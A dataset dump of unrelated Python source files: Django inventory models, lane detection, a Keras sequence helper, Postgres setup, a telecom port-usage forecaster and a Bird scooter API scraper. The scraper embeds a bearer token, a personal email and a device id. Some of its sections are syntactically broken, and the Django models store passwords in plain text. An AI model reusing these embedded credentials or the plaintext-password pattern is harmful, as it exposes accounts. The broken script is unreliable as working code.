        ordering = ["name"]
        verbose_name = '服务器信息'
        verbose_name_plural = verbose_name

    # Both __unicode__ (Python 2) and __str__ (Python 3) are provided.
    def __unicode__(self):
        return u'%s' % self.name

    def __str__(self):
        return u'%s' % self.name
class Ousers(models.Model):
    """Oracle database account on a server."""
    # NOTE(review): ForeignKey without on_delete — valid only on Django < 2.0
    # (on_delete became mandatory in 2.0); confirm the pinned Django version.
    dbserver = models.ForeignKey(Odbserver, null=True, blank=True, verbose_name='服务器')
    user = models.CharField(max_length=20, verbose_name='用户名')
    passwd = models.CharField(max_length=20, verbose_name='密码')
    tablespace = models.CharField(max_length=20, null=True, blank=True, verbose_name='表空间')
    status = models.IntegerField(choices=USER_STATUS_CHOISE, verbose_name='状态')
    business = models.CharField(null=True, blank=True, max_length=100, verbose_name='业务')
    created = models.DateField(null=True, blank=True, verbose_name='创建时间')
    comment = models.TextField(null=True, blank=True, verbose_name='备注')

    class Meta:
        ordering = ["user"]
        verbose_name = '数据库用户信息'
        verbose_name_plural = verbose_name

    def __unicode__(self):
        return u'%s' % self.business

    def __str__(self):
        return u'%s' % self.business
class Osysusers(models.Model):
    """Operating-system account on a server."""
    dbserver = models.ForeignKey(Odbserver, null=True, blank=True, verbose_name='服务器')
    name = models.CharField(max_length=20, verbose_name='名称')
    user = models.CharField(max_length=20, verbose_name='用户')
    passwd = models.CharField(max_length=20, verbose_name='密码')

    class Meta:
        ordering = ["dbserver"]
        verbose_name = '系统用户信息'
        verbose_name_plural = verbose_name

    def __unicode__(self):
        return u'%s' % self.name

    def __str__(self):
        return u'%s' % self.name
class Omysqluser(models.Model):
    """MySQL account/database pairing on a server."""
    dbserver = models.ForeignKey(Odbserver, verbose_name='服务器')
    name = models.CharField(max_length=20, verbose_name='用户名')
    passwd = models.CharField(max_length=20, verbose_name='密码')
    dbname = models.CharField(max_length=20, verbose_name='数据库名')
    business = models.CharField(null=True, blank=True, max_length=100, verbose_name='业务')
    comment = models.TextField(null=True, blank=True, verbose_name='备注')

    class Meta:
        ordering = ["dbserver"]
        verbose_name = 'MYSQL用户信息'
        verbose_name_plural = verbose_name

    def __unicode__(self):
        return u'%s' % self.business

    def __str__(self):
        return u'%s' % self.business
|
9,510 | c3a7a8a006f717057a7ad2920f19d82842b04a85 | import cv2
import numpy as np
import matplotlib.pyplot as plt
'''
def diff_of_gaussians(img):
grey_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
blur_img_grey = cv2.GaussianBlur(grey_img, (9,9), 0)
blur_img_colour = cv2.GaussianBlur(img, (9,9), 0)
#plt.figure(figsize = (20,2))
#plt.imshow(blur_img_grey, cmap = 'gray')
#plt.show()
#plt.imshow(blur_img_colour)
#plt.show()
fig, [[ax1, ax2], [ax3, ax4]] = plt.subplots(nrows = 2, ncols = 2)
edges_grey = cv2.Canny(grey_img,100,200)
edges = cv2.Canny(img, 100, 200)
#plt.subplot(411)
ax1.imshow(edges_grey, cmap = 'gray')
#plt.imshow(edges_grey, cmap = 'gray')
#plt.show()
#plt.subplot(412)
ax2.imshow(edges);
#plt.imshow(edges)
#plt.subplot(421)
ax3.imshow(canny(grey_img), cmap = 'gray')
#plt.show()
#plt.subplot(422)
ax4.imshow(canny(img))
#plt.show()
plt.show()
#plt.imshow(blur_img_grey - grey_img, cmap = 'gray')
#plt.show()
#plt.imshow(blur_img_colour - img)
#plt.show()
return
'''
def canny(img):
    """Convert `img` to greyscale, denoise it, and return its Canny edge map.

    A 9x9 Gaussian blur first suppresses high-frequency sensor noise so the
    edge detector only traces genuine intensity gradients.
    (Background: https://www.youtube.com/watch?v=uihBwtPIBxM and
    https://www.youtube.com/watch?v=sRFM5IEqR2w)
    """
    greyscale = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
    smoothed = cv2.GaussianBlur(greyscale, (9, 9), 0)
    return cv2.Canny(smoothed, 30, 150)
def region_of_interest(img):
    """Mask a single-channel edge image down to the lane-search trapezoid.

    Everything outside a trapezoid near the bottom-centre of the frame is
    zeroed; the height/width reductions below exclude the car's dashboard.
    """
    height, width = img.shape
    height -= 60
    width -= 10
    # Reducing the image size to "focus" more on the center of the frame (region of interest)
    # These dimensions are later used in the generation of the mask
    # The reduction in height enables us to ignore the part of the image corresponding to the dashboard.
    # Coordinates marking our "region of interest"
    # The top-left of the image is (0,0)
    Polygons = np.array([
        [(width, height), (50, height), (int((3/8) * width), int((3/4) * height)), (int((5/8) * width), int((3/4) * height))]
    ])
    # (width, height),(50,height) removes what's visible of the dash of the car.
    mask = np.zeros_like(img)
    # Fill the trapezoid with 255 so the bitwise AND keeps only that region.
    cv2.fillConvexPoly(img = mask, points = Polygons, color = 255, lineType = cv2.LINE_AA)
    # Uncomment "return mask" to see the "region of interest" marked in white
    mask_img = cv2.bitwise_and(img, mask)
    # mask_img now has the detected edges in our region of interest.
    #return mask
    return mask_img
def dispay_lines(img, lines):
    """Draw the given [x1, y1, x2, y2] segments on a black canvas sized like `img`.

    NOTE(review): the name is misspelled ("dispay"); renaming it would
    require updating the call in the __main__ loop below.
    """
    line_img = np.zeros_like(img)
    if lines is not None:
        for x1, y1, x2, y2 in lines:
            # Thickness-30 segment, colour (0, 255, 0).
            cv2.line(line_img, (x1, y1), (x2, y2), (0, 255, 0), 30)
    return line_img
def get_cords(img, line_slope_int):
    """Convert a (slope, intercept) line into pixel endpoint coordinates.

    The segment runs from the bottom of the image (y1 = height) one fifth
    of the way up (y2 = 4/5 * height); x values are solved from y = mx + c.

    Returns:
        np.ndarray [x1, y1, x2, y2], or [0, 0, 0, 0] when the line is
        horizontal (slope == 0, previously a ZeroDivisionError) or when
        either endpoint falls outside the image.
    """
    slope, intercept = line_slope_int
    y1 = img.shape[0]
    # Line starts from the bottom of the frame and goes one fifth of the way up.
    y2 = int(y1 * (4 / 5))
    # BUG FIX: a zero slope made the divisions below raise ZeroDivisionError;
    # treat a horizontal line as "no line found".
    if slope == 0:
        return np.array([0, 0, 0, 0])
    # From y = mx + c  =>  x = (y - c) / m.
    x1 = int((y1 - intercept) / slope)
    x2 = int((y2 - intercept) / slope)
    height, width, _ = img.shape
    # Discard lines whose endpoints leave the frame.
    if x1 > width or x1 < 0 or x2 > width or x2 < 0 or y1 > height or y1 < 0 or y2 > height or y2 < 0:
        return np.array([0, 0, 0, 0])
    return np.array([x1, y1, x2, y2])
def average_slope_intercept(img, lines):
    """Average the Hough segments into one line per sign of slope.

    Returns a 2x4 array of [x1, y1, x2, y2] rows (via get_cords); a row of
    zeros means no segments fell on that side.
    """
    left_fit = []
    right_fit = []
    #if lines is None:
    #    return (np.array([0,0,0,0]), np.array([0,0,0,0]))
    for line in lines:
        x1, y1, x2, y2 = line.reshape(4)
        # Degree-1 fit through the two endpoints gives (slope, intercept).
        slope, intercept = np.polyfit((x1, x2), (y1, y2), 1)
        # Linear least squares :) (not exactly but it's easy to think of it like this)
        print(slope, intercept)  # NOTE(review): debug output left in the per-frame loop
        # Segments with non-negative slope are grouped as "left".
        if slope >= 0:
            left_fit.append((slope, intercept))
        else:
            right_fit.append((slope, intercept))
    if left_fit:
        left_fit_avg = np.average(left_fit, axis = 0)
        left_line = get_cords(img, left_fit_avg)
    else:
        left_line = np.array([0, 0, 0, 0])
    if right_fit:
        right_fit_avg = np.average(right_fit, axis = 0)
        right_line = get_cords(img, right_fit_avg)
    else:
        right_line = np.array([0, 0, 0, 0])
    return np.array([left_line, right_line])
if __name__ == "__main__":
    # Lane-detection demo: read a dashcam video, detect edges, find lane
    # segments with a Hough transform, and overlay the averaged lane lines.
    cap = cv2.VideoCapture("./../Downloads/detect_lanes_from.mp4")
    lines = np.asarray((np.array([0, 0, 0, 0]), np.array([0, 0, 0, 0])))
    estimate = lines
    while (cap.isOpened()):
        _, frame = cap.read()
        canny_img = canny(frame)
        masked_img = region_of_interest(canny_img)
        # Keep the previous frame's lines as a fallback for frames where the
        # Hough transform finds nothing.
        estimate = lines
        #print(len(estimate), len(lines))
        # Finding straight lines and therefore the lane lines --> Hough transform
        lines = cv2.HoughLinesP(masked_img, 1, (np.pi / 180), 100, np.array([]), minLineLength = 10, maxLineGap = 500)
        #print(estimate.shape, lines.shape)
        if lines is None:
            lines = estimate
        # https://www.youtube.com/watch?v=4zHbI-fFIlI watch at 1.5x lol
        avg_lines = average_slope_intercept(frame, lines)
        #print(avg_lines)
        line_img = dispay_lines(frame, avg_lines)
        # Blend the line overlay (weight 0.8) onto the original frame.
        img_frame = cv2.addWeighted(frame, 1, line_img, 0.8, 0)
        cv2.imshow("colour_camera_frame", img_frame)
        cv2.imshow("contoured", masked_img)
        if cv2.waitKey(2) == ord('q'):
            break
    cap.release()
    cv2.destroyAllWindows()
|
9,511 | 677154aa99a5a4876532f3e1edfec45b1790384c | from flask_marshmallow import Marshmallow
from models import Uservet
# Shared Marshmallow instance; initialised against the app elsewhere.
ma = Marshmallow()


class UserVetSchema(ma.Schema):
    """Marshmallow schema for serialising Uservet rows."""
    class Meta:
        # SQLAlchemy model this schema mirrors.
        model = Uservet
        # NOTE(review): 'user_vet_1' is not a marshmallow Meta option; this
        # looks like it was meant to be `fields = (...)` — confirm with callers.
        user_vet_1 = ['dni','email','nombre','apellidos','telefono','tipo_uservet']
|
9,512 | 9db2377f15aaf28373959dad88c6ec7b6dacffd2 | import sys
# Redirect stdin so input() reads the test data from retire.txt
# (common competitive-programming setup).
sys.stdin = open('retire.txt', 'r')
def counseling(pay, row):
    """Depth-first search over take/skip choices for the consulting-schedule
    problem: arr[row] = [duration, payment]; record into the global max_sum
    the best total payment achievable by retirement day N."""
    global max_sum
    if row > N - 1:
        # Past the last day: only an exact landing on day N is a valid plan.
        if row == N:
            max_sum = max(pay, max_sum)
        return
    if row == N - 1:
        # Last day: the consultation fits only if it takes a single day.
        total = pay + arr[row][1] if arr[row][0] == 1 else pay
        max_sum = max(total, max_sum)
        return
    # Take today's consultation ...
    counseling(pay + arr[row][1], row + arr[row][0])
    # ... or skip it.
    counseling(pay, row + 1)
N = int(input())    # number of days until retirement
# arr[i] = [T_i, P_i]: consultation on day i takes T_i days and pays P_i.
arr = [list(map(int, input().split())) for _ in range(N)]
# visit = [0] * N
max_sum = 0
counseling(0, 0)
print(max_sum)
|
9,513 | 2417dd4f3787742832fec53fec4592165d0fccfc | from tensorflow import keras
class SkippableSeq(keras.utils.Sequence):
    """Wrap a keras Sequence as an endless iterator that can be fast-forwarded.

    Iteration starts at ``self.start`` and wraps around modulo ``len(seq)``,
    so ``__next__`` never raises StopIteration. A suffix slice (``s[n:]``)
    returns a shallow copy whose iteration starts at ``n``; integer indexing
    is relative to the current ``start``.
    """

    def __init__(self, seq):
        super(SkippableSeq, self).__init__()
        self.start = 0   # current read position, advanced by __next__
        self.seq = seq   # underlying keras Sequence

    def __iter__(self):
        return self

    def __next__(self):
        res = self.seq[self.start]
        # Wrap around instead of terminating.
        self.start = (self.start + 1) % len(self)
        return res

    def __getitem__(self, i):
        if isinstance(i, slice):
            # Only a plain suffix slice of an unadvanced sequence is allowed.
            assert i.step is None and i.stop is None and self.start == 0, \
                'only one suffix slicing allowed'
            # FIX: `copy` was never imported at module level, so the original
            # raised NameError the first time a slice was taken.
            import copy
            oth = copy.copy(self)
            oth.start = i.start
            return oth
        else:
            return self.seq[(self.start + i) % len(self)]

    def __len__(self):
        return len(self.seq)
class PostprocessSeq(SkippableSeq):
    """SkippableSeq that pushes every item through a postprocess callable."""

    def __init__(self, postprocess, seq):
        super(PostprocessSeq, self).__init__(seq)
        self.postprocess = postprocess   # applied to every yielded item

    def __next__(self):
        item = super(PostprocessSeq, self).__next__()
        return self.postprocess(item)

    def __getitem__(self, i):
        item = super(PostprocessSeq, self).__getitem__(i)
        return self.postprocess(item)
def make_enqueuer_generator(sequence, workers):
    """Start a keras OrderedEnqueuer over `sequence` with the given worker
    count and return its batch generator."""
    enqueuer = keras.utils.OrderedEnqueuer(sequence)
    enqueuer.start(workers=workers, max_queue_size=workers + 1)
    return enqueuer.get()
|
9,514 | 09792da1c3cc38c7df7def2b487c2078de4e8912 | import config
import psycopg2
from psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT
def check_db_exists(opt):
    """Return True if a connection described by DSN `opt` can be opened.

    Prints a human-readable status either way. FIXES: the original used a
    bare `except:` (which also swallowed KeyboardInterrupt etc.) and never
    closed the connection it opened.
    """
    try:
        conn = psycopg2.connect(opt)
    except psycopg2.Error:
        print("Database doesn't exist.")
        return False
    try:
        cur = conn.cursor()
        cur.close()
        print('Database exists.')
        return True
    finally:
        conn.close()
def create_db(opt):
    """Create the configured database if the connection check fails.

    CREATE DATABASE cannot run inside a transaction, hence autocommit.
    FIX: the original leaked the connection (never closed).
    """
    if check_db_exists(opt):
        return
    print("Creating new database.")
    conn = psycopg2.connect(opt)
    try:
        conn.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)
        with conn.cursor() as cur:
            # NOTE(review): db_name is interpolated as an identifier; it must
            # come from trusted config (identifiers cannot be parameterized).
            cur.execute(f"CREATE DATABASE {config.db_name};")
    finally:
        conn.close()
def create_tables(opt):
    """Create the stock/price/fundamentals/news tables if they don't exist.

    FIXES: the original opened a brand-new connection for every command and
    never closed any of them, and its except-clause referenced `cur`, which
    could be unbound if connect() itself failed. One connection is now used
    for all commands and always closed.
    """
    if not check_db_exists(opt):
        return
    commands = (""" CREATE TABLE IF NOT EXISTS stock (
                        id SERIAL PRIMARY KEY,
                        ticker VARCHAR NOT NULL,
                        name VARCHAR NOT NULL,
                        created_date TIMESTAMP NOT NULL,
                        last_updated_date TIMESTAMP NOT NULL
                    )
                """,
                """ CREATE TABLE IF NOT EXISTS price (
                        id SERIAL PRIMARY KEY,
                        stock_id INTEGER NOT NULL,
                        created_date TIMESTAMP NOT NULL,
                        last_updated_date TIMESTAMP NOT NULL,
                        date_price TIMESTAMP,
                        open_price NUMERIC,
                        high_price NUMERIC,
                        low_price NUMERIC,
                        close_price NUMERIC,
                        volume BIGINT,
                        FOREIGN KEY (stock_id) REFERENCES stock(id))
                """,
                """ CREATE TABLE IF NOT EXISTS fundamentals (
                        id SERIAL PRIMARY KEY,
                        stock_id INTEGER NOT NULL,
                        created_date TIMESTAMP NOT NULL,
                        last_updated_date TIMESTAMP NOT NULL,
                        longBusinessSummary TEXT,
                        sector VARCHAR,
                        sharesOutstanding BIGINT,
                        marketCap BIGINT,
                        forwardPE REAL,
                        dividendYield REAL,
                        beta REAL,
                        previousClose REAL,
                        averageVolume BIGINT,
                        FOREIGN KEY (stock_id) REFERENCES stock(id))
                """,
                """ CREATE TABLE IF NOT EXISTS news (
                        id SERIAL PRIMARY KEY,
                        stock_id INTEGER NOT NULL,
                        news_date TIMESTAMP NOT NULL,
                        headline VARCHAR NOT NULL,
                        url VARCHAR NOT NULL,
                        sentiment REAL,
                        FOREIGN KEY (stock_id) REFERENCES stock(id))
                """
                )
    conn = None
    try:
        conn = psycopg2.connect(opt)
        with conn.cursor() as cur:
            for command in commands:
                print('Building database tables')
                cur.execute(command)
                conn.commit()
    except (Exception, psycopg2.DatabaseError) as e:
        print(e)
    finally:
        if conn is not None:
            conn.close()
def main():
    """Build the DSN from config and ensure the database and tables exist."""
    dsn = (
        f"postgres://{config.username}:{config.password}"
        f"@{config.host}:{config.port}/{config.cluster}.{config.db_name}"
        f"?sslmode=verify-full&sslrootcert={config.cert_dir}/cc-ca.crt"
    )
    create_db(dsn)
    create_tables(dsn)


if __name__ == "__main__":
    main()
|
9,515 | 9e43eb3c3ab3be4e695dbc80aa005332b8d8a4ec | from django.apps import AppConfig
from django.utils.translation import gettext_lazy as _
class StravaAuthConfig(AppConfig):
    """Django app configuration for the bundled strava_django integration."""
    name = "strava.contrib.strava_django"
    verbose_name = _("Strava Auth")

    def ready(self):
        # No startup wiring (signal registration etc.) is needed yet.
        pass
|
9,516 | 9c320db85ca1a9df6b91f6bb062e4d5c3d94ee91 | from test.framework import TestCase
from test.mock import Mock
from package.util.svnutil import ReleaseXmlParser, Release
import time
class SvnUtilTests(TestCase):
    """Tests for ReleaseXmlParser against a canned `svn list --xml` dump
    (the module-level `xml` fixture)."""

    def _release(self, name, rtype, version, stamp):
        # Build one expected Release record from its parts.
        rel = Release()
        rel.name = name
        rel.type = rtype
        rel.version = version
        rel.date = time.strptime(stamp, '%Y-%m-%d %H:%M:%S')
        return rel

    def setUp(self):
        self.expected = [
            self._release('BETA1.1.0', 'BETA', '1.1.0', '2009-04-21 23:22:03'),
            self._release('STABLE0.4.9', 'STABLE', '0.4.9', '2009-01-07 22:58:31'),
        ]

    def testXmlLoad(self):
        """ XML from svn list should be parsed correctly into releases"""
        parser = ReleaseXmlParser(text=xml)
        releases = parser.get_releases()
        self.assertTrue(releases, 'No release loaded')
        self.assertEquals(self.expected, releases, "Releases not loaded correctly")
xml = """<?xml version="1.0"?>
<lists>
<list
path="svn://localhost/tools/packagehelper/tags">
<entry
kind="dir">
<name>1.0.1b</name>
<commit
revision="39">
<author>daniel</author>
<date>2009-04-07T05:59:19.743486Z</date>
</commit>
</entry>
<entry
kind="dir">
<name>BETA1.1.0</name>
<commit
revision="43">
<author>dsaran</author>
<date>2009-04-21T23:22:03.748373Z</date>
</commit>
</entry>
<entry
kind="dir">
<name>RELEASE_1_0_0b</name>
<commit
revision="37">
<author>daniel</author>
<date>2009-04-06T17:49:17.446056Z</date>
</commit>
</entry>
<entry
kind="dir">
<name>STABLE0.4.9</name>
<commit
revision="3">
<date>2009-01-07T22:58:31.000000Z</date>
</commit>
</entry>
</list>
</lists>"""
|
9,517 | c5f46be6d7214614892d227c76c75e77433a8fa9 | from CTO import CTO
#from UI import UIManager
from Cidades import Cidades
from Database import Database
from datetime import datetime
class Main:
    """Pipeline entry point: parse a CTO port-occupancy CSV, fetch the
    previous snapshot from the database, and insert today's readings
    together with a naive exhaustion forecast (free ports divided by the
    daily growth of occupied ports since the last snapshot)."""

    def __init__(self, cidade_filename="", dados_filename=""):
        #cidade_filename, dados_filename = UIManager().get_filenames()
        print("cidade: " + cidade_filename)
        # City lists classifying each locality as "concessao" or "expansao".
        self.cidades = Cidades(cidade_filename)
        # NOTE(review): indentation reconstructed from a whitespace-mangled
        # source — the three pipeline steps are assumed to run only when a
        # data file was supplied; confirm against the original.
        if dados_filename != "":
            self.processaCSV(dados_filename)
            self.recuperaDados()
            self.insereDados()

    def processaCSV(self, filename):
        """Parse the ';'-separated export and bucket one CTO object per CTO
        name, feeding it every port-status reading.

        Column layout (0-based), as read below: 1 = CTO name, 13 = status,
        14 = locality, 15 = station.
        """
        with open(filename, 'r', encoding='ISO-8859-1') as input_file:
            self.concessao = {}
            self.expansao = {}
            for line in input_file.readlines():
                attributes = line.split(';')
                localidade = str(attributes[14])
                estacao = str(attributes[15])
                cto = str(attributes[1])
                status = str(attributes[13])
                if localidade in self.cidades.concessao:
                    if cto in self.concessao:
                        self.concessao[cto].addLeitura(status)
                    else:
                        self.concessao[cto] = CTO(localidade, estacao, cto)
                        self.concessao[cto].addLeitura(status)
                elif localidade in self.cidades.expansao:
                    if cto in self.expansao:
                        self.expansao[cto].addLeitura(status)
                    else:
                        self.expansao[cto] = CTO(localidade, estacao, cto)
                        self.expansao[cto].addLeitura(status)

    def insereDados(self):
        """Insert today's readings into both tables.

        previsao_esgotamento = free ports / (occupied-port growth per day
        since the previous snapshot); -1 when it cannot be computed
        (new CTO, zero growth, missing history, zero days elapsed).
        """
        hoje = datetime.utcnow()
        #hoje = datetime(2019, 1, 25)
        argsCn = []
        for nome, cto in self.concessao.items():
            nomeCto = cto.dict['CTO']
            try:
                # Previous snapshot row: index 8 = occupied count, 1 = date.
                antigoOcupado = self.antigoConcessao[nomeCto][8]
                antigoData = self.antigoConcessao[nomeCto][1]
                ocupadoAtual = int(cto.dict['OCUPADO'])
                vagoAtual = int(cto.dict['VAGO'])
                numDias = (hoje - self.antigoConcessao[nomeCto][1]).days
                taxa_crescimento = (ocupadoAtual - antigoOcupado) / numDias
                previsao = vagoAtual / taxa_crescimento
            except Exception as e:
                # Any failure maps to the sentinel -1 ("no forecast").
                previsao = -1
            argsCn.append(
                (hoje,) + cto.as_a_tuple() + (previsao,)
            )
        argsEx = []
        for nome, cto in self.expansao.items():
            nomeCto = cto.dict['CTO']
            try:
                antigoOcupado = self.antigoExpansao[nomeCto][8]
                antigoData = self.antigoExpansao[nomeCto][1]
                ocupadoAtual = int(cto.dict['OCUPADO'])
                vagoAtual = int(cto.dict['VAGO'])
                numDias = (hoje - self.antigoExpansao[nomeCto][1]).days
                taxa_crescimento = (ocupadoAtual - antigoOcupado) / numDias
                previsao = vagoAtual / taxa_crescimento
            except Exception as e:
                previsao = -1
            argsEx.append(
                (hoje,) + cto.as_a_tuple() + (previsao,)
            )
        db = Database()
        query = """INSERT INTO concessao (dia, local, estacao, cto, defeito, designado, reservado, ocupado, vago, total, previsao_esgotamento)
                VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"""
        db.executaQuery(query, argsCn)
        query = """INSERT INTO expansao (dia, local, estacao, cto, defeito, designado, reservado, ocupado, vago, total, previsao_esgotamento)
                VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"""
        db.executaQuery(query, argsEx)

    def recuperaDados(self):
        """Load the most recent snapshot of both tables, keyed by CTO name
        (column index 4 of each row)."""
        db = Database()
        self.antigoConcessao = {}
        self.antigoExpansao = {}
        for registro in db.executaQuery('SELECT * from concessao where dia = (select Max(dia) from concessao)'):
            self.antigoConcessao[registro[4]] = registro
        for registro in db.executaQuery('SELECT * from expansao where dia = (select Max(dia) from expansao)'):
            self.antigoExpansao[registro[4]] = registro
if __name__ == '__main__':
    # NOTE(review): Main() runs with empty filenames here, so Cidades("")
    # must tolerate an empty path — confirm against Cidades' implementation.
    Main()
|
9,518 | 2d192963bfe046bce1a0c82e0179380693f5c541 | from tkinter import *
# Show flag.png in a minimal Tk window; blocks in mainloop() until closed.
root = Tk()
# NOTE(review): Tk's PhotoImage needs Tk 8.6+ for PNG files — confirm target.
photo = PhotoImage(file = 'flag.png')
panel = Label(root, image=photo)
panel.pack()
root.mainloop()
|
9,519 | 020691fe2c7e7092d45415b72ce1804618421a2a | """
Question:
You are given a string s consisting only of digits 0-9, commas ,, and dots .
Your task is to complete the regex_pattern defined below, which will be used to
re.split() all of the , and . symbols in s.
It’s guaranteed that every comma and every dot in s is preceded and followed
by a digit.
Sample Input:
100,000,000.000
Sample Output:
100
000
000
000
"""
# Solution:
import re

# Split on every comma or dot; the problem statement guarantees each
# separator is surrounded by digits, so a plain character class suffices.
regex_pattern = r"[,.]"
print("\n".join(re.split(regex_pattern, input())))
|
9,520 | 625a5d14aaf37493c3f75ec0cdce77d45ca08f78 | #Packages to be imported
import requests
import pandas as pd
from geopy.distance import distance
import json
from datetime import date
from datetime import datetime
import time
#POST request to get authentication token
# Logs in to the (unofficial) Bird API; the response carries the bearer
# token used by the GET requests below.
# NOTE(review): personal e-mail and device id are hard-coded — move to config.
URL = "https://api.birdapp.com/user/login"
email = {"email": "himanshu.agarwal20792@gmail.com"}
headers = {"User-Agent": "Bird/4.41.0 (co.bird.Ride; build:37; iOS 12.3.1) Alamofire/4.41.0",
           "Device-Id": "54253685-49a0-48e0-a239-759e77639506",
           "Platform": "ios",
           "App-Version": "4.41.0",
           "Content-Type": "application/json"}
r = requests.post(URL, json= email, headers = headers)
r.status_code   # no-op expression; only useful in an interactive session
print(r.text)
#GET request to fetch the data
"""Washington D.C. - George Washington University"""
URL_get3 = "https://api.birdapp.com/bird/nearby?latitude=38.899600&longitude=-77.048820&radius=0.00001"
loc3 = {"latitude":38.899600,"longitude":-77.04882,"altitude":500,"accuracy":100,"speed":-1,"heading":-1}
# NOTE(review): the bearer token below is hard-coded and carries an expiry —
# it will stop working and should be obtained from the login call above.
headers_get3 = {
    "Authorization": "Bird eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJBVVRIIiwidXNlcl9pZCI6IjVlYWQ2M2UyLWFiNGItNDZiYy1hNjZlLTI5N2NmNTJkM2VkMSIsImRldmljZV9pZCI6IjU0MjUzNjg1LTQ5YTAtNDhlMC1hMjM5LTc1OWU3NzYzOTUwNiIsImV4cCI6MTU5NzM2OTk2N30.hVSnrrx_adyrS2ecIyRba5E8Q-3RoylZ8WwBbqo15GY",
    "Device-id": "54253685-49a0-48e0-a239-759e77639506",
    "App-Version": "4.41.0",
    "Location": '{"latitude":38.899600,"longitude":-77.048820,"altitude":500,"accuracy":100,"speed":-1,"heading":-1}'
}
rget3 = requests.get(URL_get3, headers = headers_get3, params = loc3)
rget3.status_code   # no-op expression outside a REPL
rget3.text          # no-op expression outside a REPL
json_data3 = rget3.json()
"""
To get configuration settings
URL_get4 = "https://api.birdapp.com/config/location?latitude=42.3140089&longitude=-71.2490943
loc3 = {"latitude":38.922368,"longitude":-77.019448,"altitude":500,"accuracy":100,"speed":-1,"heading":-1}
headers_get4 = {
"App-Version": "4.41.0"
}
rget4 = requests.get(URL_get4, headers = headers_get4)
rget4.status_code
rget4.text
json_data4 = rget4.json()
"""
"""Arlington"""
URL_get5 = "https://api.birdapp.com/bird/nearby?latitude=38.883694&longitude=-77.168652&radius=0.00001"
loc5 = {"latitude":38.883694,"longitude":-77.168652,"altitude":500,"accuracy":100,"speed":-1,"heading":-1}
headers_get5 = {
"Authorization": "Bird eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJBVVRIIiwidXNlcl9pZCI6IjVlYWQ2M2UyLWFiNGItNDZiYy1hNjZlLTI5N2NmNTJkM2VkMSIsImRldmljZV9pZCI6IjU0MjUzNjg1LTQ5YTAtNDhlMC1hMjM5LTc1OWU3NzYzOTUwNiIsImV4cCI6MTU5NzM2OTk2N30.hVSnrrx_adyrS2ecIyRba5E8Q-3RoylZ8WwBbqo15GY",
"Device-id": "54253685-49a0-48e0-a239-759e77639506",
"App-Version": "4.41.0",
"Location": '{"latitude":38.883694,"longitude":-77.168652,"altitude":500,"accuracy":100,"speed":-1,"heading":-1}'
}
rget5 = requests.get(URL_get5, headers = headers_get5, params = loc5)
rget5.status_code
rget5.text
json_data5 = rget5.json()
#Putting birds values as a dataframe
import pandas as pd
df5 = pd.DataFrame.from_dict(json_data5['birds'], orient = 'columns')
df5 = pd.concat([df5.drop(['location'],axis=1), df5['location'].apply(pd.Series)],axis=1)
"""Washington DC -2"""
URL_get6 = "https://api.birdapp.com/bird/nearby?latitude=38.910456&longitude=-76.987568&radius=0.00001"
loc6 = {"latitude":38.910456,"longitude":-76.987568,"altitude":500,"accuracy":100,"speed":-1,"heading":-1}
headers_get6 = {
"Authorization": "Bird eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJBVVRIIiwidXNlcl9pZCI6IjVlYWQ2M2UyLWFiNGItNDZiYy1hNjZlLTI5N2NmNTJkM2VkMSIsImRldmljZV9pZCI6IjU0MjUzNjg1LTQ5YTAtNDhlMC1hMjM5LTc1OWU3NzYzOTUwNiIsImV4cCI6MTU5NzM2OTk2N30.hVSnrrx_adyrS2ecIyRba5E8Q-3RoylZ8WwBbqo15GY",
"Device-id": "54253685-49a0-48e0-a239-759e77639506",
"App-Version": "4.41.0",
"Location": '{"latitude":38.910456,"longitude":-76.987568,"altitude":500,"accuracy":100,"speed":-1,"heading":-1}'
}
rget6 = requests.get(URL_get6, headers = headers_get6, params = loc6)
rget6.status_code
rget6.text
json_data6 = rget6.json()
#Finding distance of bikes from origin point and appending the values to the json data
# George Washington University origin.
# FIX: the original section header used unbalanced quadruple quotes
# (""""...""""), which is a SyntaxError in Python; a comment is used instead.
x = 0
radius = []
gwu = (38.899600, -77.04882)
for i in json_data3['birds']:
    d = json_data3['birds'][x]['location']
    b = tuple(d.values())
    r = distance(gwu, b).mi   # geopy distance in miles
    radius.append(r)
    x = x + 1
    # Annotate each bird record with its distance and a capture timestamp.
    i.update({'Origin_Dist':r})
    i.update({'Date':date.today().strftime('%Y-%m-%d')})
    i.update({'Time':datetime.now().strftime('%H-%M-%S')})
    i.update({'Origin_Loc':'DC-GWU'})
print(max(radius))
""""Washington-DC 2""""
x2=0
radius2 = []
dc2 = (38.910456,-76.987568)
for i in json_data6['birds']:
d2 = json_data6['birds'][x2]['location']
b2 = tuple(d2.values())
r = distance(dc2,b2).mi
radius2.append(r)
x2 = x2+1
i.update({'Origin_Dist':r})
i.update({'Date':date.today().strftime('%Y-%m-%d')})
i.update({'Time':datetime.now().strftime('%H-%M-%S')})
i.update({'Origin_Loc':'DC-2'})
print(max(radius2))
"""Arlington""""
x3=0
radius3 = []
dc3 = (38.910456,-76.987568)
for i in json_data5['birds']:
d3 = json_data5['birds'][x3]['location']
b3 = tuple(d3.values())
r = distance(dc3,b3).mi
radius3.append(r)
x3 = x3+1
i.update({'Origin_Dist':r})
i.update({'Date':date.today().strftime('%Y-%m-%d')})
i.update({'Time':datetime.now().strftime('%H-%M-%S')})
i.update({'Origin_Loc':'Arlington'})
print(max(radius3))
#Creating a dataframe for data received from each origin point
"""George Washington Univ"""
df3 = pd.DataFrame.from_dict(json_data3['birds'], orient = 'columns')
# Flatten the nested 'location' dict into latitude/longitude columns.
df3 = pd.concat([df3.drop(['location'],axis=1), df3['location'].apply(pd.Series)],axis=1)
"""Washington-DC 2"""
df6 = pd.DataFrame.from_dict(json_data6['birds'], orient = 'columns')
df6 = pd.concat([df6.drop(['location'],axis=1), df6['location'].apply(pd.Series)],axis=1)
"""Arlington"""
# NOTE(review): df5 was already built earlier in the file; this recomputes it.
df5 = pd.DataFrame.from_dict(json_data5['birds'], orient = 'columns')
